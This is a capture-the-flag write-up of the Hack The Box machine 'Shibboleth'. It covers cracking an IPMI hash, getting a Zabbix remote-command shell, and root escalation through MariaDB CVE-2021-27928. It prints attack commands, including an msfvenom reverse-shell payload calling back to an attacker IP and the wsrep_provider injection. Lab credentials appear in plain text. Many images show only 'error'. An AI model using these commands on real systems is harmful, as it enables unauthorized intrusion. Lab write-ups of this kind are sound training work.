3 minute read

In this Box we are going to enumerate a udp port and dump the administrator hash ,then we will crack it , using these credentials we will login to the zabbix web interface , using my exploit for this version of zabbix we will get a low-privilege shell. re-using same password will leverage our access to a user. for the root part we will exploit a vulnerable maria-db version

Scanning :

basic scanning :

nmap -A -T4 10.10.11.124

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

it was suspicious to have only this port , so i performed a udp scan as well :

sudo nmap -sU 10.10.11.124

PORT    STATE SERVICE
623/udp open  asf-rmcp

we can add shibboleth.htb to the /etc/hosts and move on to enumeration

Enumeration :

we can start performing some vhost enumeration :

ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb"  -fc 302

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

and add them to the /etc/hosts as well

10.10.11.124	shibboleth.htb	monitor.shibboleth.htb	zabbix.shibboleth.htb

the UDP port we have found eariler seems worthy to search for , and you can find this post from Hacktricks

we can use that to find the version first

error

then we can try that :

error

seems to be IPMI-2.0 UserAuth , from the same post we can see :

error

we can try that :

error

and it retrieves a hash , we can see if we can crack it.

from hashcat wiki here

error

hashcat -m 7300 hash2 /usr/share/wordlists/rockyou.txt

error

so now we have these credentials Administrator:ilovepumkinpie1

after this point i performed some enumeration to the IPMI like :

ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1  user list

and other But seems i went so far from the foothold :(

now we can take a look at the TCP port 80 we have found earlier

shibboleth.htb is not interesting at all , all pages are static

error

zabbix.shibboleth.htb has login page so obviously i tried the credentials we have

error

and we are in :

error

Foothold:

if you look at the footer you will find the zabbix version:

error

searching for it i found no exploits , you can start doing your research and will find at the documentation here the web interface can execute remote commands

actually to exploit it you will do a lot of searching in different options at the web page until you find the page.

at this time i was practicing python so why not to write my first published exploit ?

you will find it here

error

so let’s download it and try using the exploit

error

and after one minute:

error

Privilege escalation:

only one user exist which is ipmi_svc , and we have the password from the ipmi right , worthy trying it :

error

and it works

Root Access

Uploading Linpeas to the Box and start investigating the output :

error

error

error

and as we can see Maria DB is running locally only , and we can see linpeas found the username and the password to connect to the database, we can try interact with it

we can read the file except the comments , hence it won’t be applicable

cat /etc/zabbix/zabbix_server.conf | grep -v "#"

error

now let’s try interact with it :

 # password :bloooarskybluh
 mysql -u zabbix -D zabbix -p

and we are in :

error

this Maria-DB version we see at the banner is Vulnerable to OS command injection , and we can find the exploit here

following the steps:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.52 LPORT=1337 -f elf-so -o CVE-2021-27928.so

set the listener and move the .so file to the Box. then on the box login to the database then :

MariaDB [zabbix]> SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";

error